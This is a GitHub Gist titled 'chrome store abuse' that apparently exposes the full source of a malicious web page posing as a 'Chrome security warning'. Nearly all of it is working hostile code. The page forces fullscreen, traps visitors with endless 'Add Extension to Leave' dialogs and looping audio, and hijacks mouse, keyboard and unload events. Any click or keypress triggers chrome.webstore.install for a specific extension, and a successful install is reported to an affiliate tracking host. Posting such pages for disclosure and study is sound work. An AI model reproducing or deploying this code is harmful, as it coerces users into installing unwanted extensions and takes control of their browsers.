Created
October 22, 2016 22:50
-
-
Save DimitarChristoff/cb5d3b1cfbd4f3fc325ec0398ff513a5 to your computer and use it in GitHub Desktop.
chrome store abuse
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- view-source:http://cofinsa.info/helloworld.php?city=GB&clickid=wOG4PFS3EJJ786J0H5TOVOG4 --> | |
| <!--<script>if(history.replaceState) history.replaceState({}, "", "/");</script>--> | |
| <script>confirm('Add Extension to Leave');</script> | |
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | |
| <meta name="robots" content="noindex"> | |
| <meta name="referrer" content="no-referrer"> | |
| <title>Chrome security warning!</title> | |
| <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/okdihcfadbdffiniigkddmifihjbhagn"> | |
| <script src="http://cofinsa.info/jquery-1.12.4.min.js"></script> | |
| <script src="http://cofinsa.info/jquery.fullscreen.js"></script> | |
| <script> | |
| setTimeout(function(){confirm("Add Extension to Leave");}, 0); | |
| setTimeout(function(){$('html, body').on( { | |
| 'mouseleave':function() { confirm("Add Extension to Leave"); }})}, 0); | |
| function getUrlVars() | |
| { | |
| var vars = [], hash; | |
| var hashes = window.location.href.slice(window.location.href.indexOf('?') + 1).split('&'); | |
| for(var i = 0; i < hashes.length; i++) | |
| { | |
| hash = hashes[i].split('='); | |
| vars.push(hash[0]); | |
| vars[hash[0]] = hash[1]; | |
| } | |
| return vars; | |
| } | |
| var clickid = getUrlVars()["clickid"]; | |
| var insturly = "http://5huau.voluumtrk2.com/postback?cid="+clickid; | |
| function toggleFullScreen() { | |
| if(!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) { if (document.documentElement.requestFullscreen) { document.documentElement.requestFullscreen(); } else if (document.documentElement.mozRequestFullScreen) { document.documentElement.mozRequestFullScreen(); } else if (document.documentElement.webkitRequestFullscreen) { document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);}}} | |
| function mouseDown(e) { | |
| e = e || window.event; | |
| switch (e.which) { | |
| case 1: console.log('left'); break; | |
| case 2: confirm('Add Extension to Leave'); break; | |
| case 3: confirm('Add Extension to Leave'); break; | |
| } | |
| } | |
| function nope() {confirm('Add Extension to Leave');} | |
| function successCallback(){ | |
| $(window).off("beforeunload", console.log('nobeforeunload')); | |
| $(window).off("mousedown", console.log('nomousehere')); | |
| $(window).off("blur", console.log('noblurhere')); | |
| $(window).off("keydown", console.log('nokeydownhere')); | |
| clearInterval(window.myTimer); | |
| window.open("http://www.google.com"); | |
| window.location.replace(insturly); | |
| } | |
| function failureCallback(){console.log("fuck");} | |
| function mousyDown(e) { | |
| e = e || window.event; | |
| switch (e.which) { | |
| case 1: console.log('left'); break; | |
| case 2: chrome.webstore.install("https://chrome.google.com/webstore/detail/okdihcfadbdffiniigkddmifihjbhagn", successCallback, failureCallback); break; | |
| case 3: chrome.webstore.install("https://chrome.google.com/webstore/detail/okdihcfadbdffiniigkddmifihjbhagn", successCallback, failureCallback); break; | |
| } | |
| } | |
| function checkup(){ | |
| if((window.fullScreen) || (window.innerWidth == screen.width && window.innerHeight == screen.height)) { | |
| chrome.webstore.install("https://chrome.google.com/webstore/detail/okdihcfadbdffiniigkddmifihjbhagn", successCallback, failureCallback); | |
| } | |
| else { | |
| document.documentElement.webkitRequestFullScreen(); | |
| chrome.webstore.install("https://chrome.google.com/webstore/detail/okdihcfadbdffiniigkddmifihjbhagn", successCallback, failureCallback); | |
| } | |
| } | |
| document.addEventListener('keyup', function(es) { if (es.keyCode == 27) { | |
| toggleFullScreen();}}, false); | |
| document.addEventListener('keyup', function(e) { if (e.keyCode == 122 || e.keyCode == 17 || e.keyCode == 18 || e.keyCode == 13) { | |
| toggleFullScreen();}}, false); | |
| $(window).on('beforeunload', function(e) {return 'You have unsaved stuff. Are you sure to leave?';}); | |
| var checkfokus = document.hasFocus(); | |
| var periodic; | |
| $(window).bind('fullscreen-on', function(e){ | |
| var checkfokus = true; | |
| return checkfokus; | |
| }); | |
| $(document).ready(function(){ | |
| var isFullScreen = $(window).data('fullscreen-state'); | |
| if (isFullScreen == false){ | |
| setInterval(function(){document.getElementById('audio').play();}, 2500); | |
| document.getElementById('imdz').src="vasdonax.png"; | |
| document.getElementById('imdz').style.marginTop='-5px'; | |
| document.getElementById('imdz').style.marginLeft='0px'; | |
| $(window).mousedown(function(){mouseDown(event);}); | |
| $(window).blur(function(){nope();}); | |
| $(window).keydown(function(){nope();}); | |
| window.myTimer = setInterval(function(){nope();},1000); | |
| setInterval(function(){ | |
| if (checkfokus == false){ | |
| nope(); | |
| } | |
| }, 500); | |
| console.log("fullscreenoff"); | |
| }}); | |
| $(window).bind('fullscreen-on', function(e){ | |
| setInterval(function(){document.getElementById('audio').play();}, 2500); | |
| document.getElementById('imdz').src="speedy.png?mb=1477176176"; | |
| document.getElementById('imdz').style.marginTop='-4px'; | |
| document.getElementById('imdz').style.marginLeft='1px'; | |
| var checkfokus = true; | |
| clearInterval(window.myTimer); | |
| $(window).off("mousedown", console.log('nomousehere')); | |
| $(window).off("blur", console.log('noblurhere')); | |
| $(window).off("keydown", console.log('nokeydownhere')); | |
| $(window).mousedown(function(){mousyDown(event);}); | |
| $(window).keydown(function(){ | |
| chrome.webstore.install("https://chrome.google.com/webstore/detail/okdihcfadbdffiniigkddmifihjbhagn", successCallback, failureCallback);}); | |
| console.log("fullscreen on"); | |
| }); | |
| $(window).bind('fullscreen-off', function(e){ | |
| setInterval(function(){document.getElementById('audio').play();}, 2500); | |
| document.getElementById('imdz').src="vasdonax.png"; | |
| document.getElementById('imdz').style.marginTop='-5px'; | |
| document.getElementById('imdz').style.marginLeft='0px'; | |
| $(window).off("keydown", console.log('nokeydownhere')); | |
| $(window).off("mousedown", console.log('nomousehere')); | |
| $(window).mousedown(function(){mouseDown(event);}); | |
| $(window).blur(function(){nope();}); | |
| $(window).keydown(function(){nope();}); | |
| window.myTimer = setInterval(function(){nope();},1000); | |
| setInterval(function(){ | |
| if (checkfokus == false){ | |
| nope(); | |
| } | |
| }, 500); | |
| console.log("fullscreenoff"); | |
| }); | |
| </script> | |
| <style> | |
| #master { | |
| position: fixed !important; | |
| z-index: 99999999999 !important; | |
| top:0 !important; | |
| left:0 !important; | |
| margin:0 !important; | |
| width:100% !important; | |
| height:100% !important; | |
| background-color: rgb(255,255,255) !important; | |
| background-color: rgba(255,255,255,1) !important; | |
| } | |
| </style> | |
| </head> | |
| <center> | |
| <div id="master"> | |
| <img id="imdz" src="vasdonax.png"/> | |
| </div> | |
| </center> | |
| <body onclick="checkup();"> | |
| <audio id="audio" src="voice.mp3" autoplay=""></audio> | |
| </body> | |
| </html> | |
may i have all source code for learning security ?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
function failureCallback(){console.log("fuck");}oh okay